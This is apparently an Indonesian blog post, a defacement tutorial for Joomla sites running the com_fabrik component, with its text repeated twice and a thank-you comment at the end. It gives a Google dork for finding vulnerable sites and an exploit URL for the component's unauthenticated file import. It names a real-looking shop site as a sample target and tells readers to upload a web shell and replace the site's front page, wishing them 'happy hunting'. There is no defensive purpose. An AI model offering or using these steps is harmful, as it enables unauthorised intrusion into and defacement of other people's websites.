Untuk para master, dedengkot, mbahnya hacker khususnya defacer, pasti
sudah tidak asing lagi Exploit com_fabrik. Namun untuk newbie seperti
ane pasti masih clingak-clinguk. Maka dari itu ane mau berbagi sesuatu
bagi yang belom tau :)
Oke, untuk yang belum tahu disimak ya :)
Dork :
inurl:"index.php?option=com_fabrik"site:.uk (silahkan dikembangkan)
Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Langkah2nya :
Buka mbah google.com
Masukkan Dorknya tadi inurl:"inurl:"index.php?option=com_fabrik"site:.uk"
Pilih target. Misal kita mendapat http://www.case-stores.de/index.php?opti...mp;lang=de
Setelah menemukan target, ganti (explotasi) URLnya hingga menjadi http://www.case-stores.de/index.php?opti...1echercher
![[Image: 3_zps5c343d96.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uUcWH0EFMH1y5z6xj8so9wQzyEmAYhLO1uDMhLKOJGWr4c1wpQhTxY4AJU33AlBGISzI8ipSrFLbwB5sDouqeI-xBf_jVcM7NP1y4LQlOS3MdadctuxotCT9weX88U3hwJlrjPlEE=s0-d)
maka hasil nya seperti ini ,kalo tidak seperti ini mending cari yang lain :)
Upload shell ente Dan untuk melihat shell yang telah di upload, buka http://www.target.com/media/shell.php
![[Image: 4_zps8cde2690.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s01MGSzUKuyAnCP2KSqh_gNH719dCM_LIYgBdHVlN3Nq8-wmLQqFpLGWFlIdoJNrFwub2SgLJp_7firtzV_J10RfaRxFPOQxFaDuxz_iUcR_sPobClS5sLlC5HPZ17QSQj02JFKA=s0-d)
seperti ini ,sekarang kita udah masuk ke web tersebut tinggal ganti index nya :)
![[Image: 5_zpsfe8fbe56.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_shaj649gGZyOBvg1qlS4dgmC2zbyaYtwkdZ9PKOwch-1mPUqk938hSOLIscEcux3JHecinOScKBgVhD6kJCjsfBShqIkNibHF8hryrnUhs82RlBnP1XlYD7r7S7v7KiHQ63-uYX-I=s0-d)
dan taraaaaaaaa berhasil :)
Mudah banget kan??? :)
Oke, selamat berburu....
Oke, untuk yang belum tahu disimak ya :)
Dork :
inurl:"index.php?option=com_fabrik"site:.uk (silahkan dikembangkan)
Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Langkah2nya :
Buka mbah google.com
Masukkan Dorknya tadi inurl:"inurl:"index.php?option=com_fabrik"site:.uk"
Pilih target. Misal kita mendapat http://www.case-stores.de/index.php?opti...mp;lang=de
Setelah menemukan target, ganti (explotasi) URLnya hingga menjadi http://www.case-stores.de/index.php?opti...1echercher
maka hasil nya seperti ini ,kalo tidak seperti ini mending cari yang lain :)
Upload shell ente Dan untuk melihat shell yang telah di upload, buka http://www.target.com/media/shell.php
seperti ini ,sekarang kita udah masuk ke web tersebut tinggal ganti index nya :)
dan taraaaaaaaa berhasil :)
Mudah banget kan??? :)
Oke, selamat berburu....
1 comments:
Tulis commentsthx ya atas informasi.a
Reply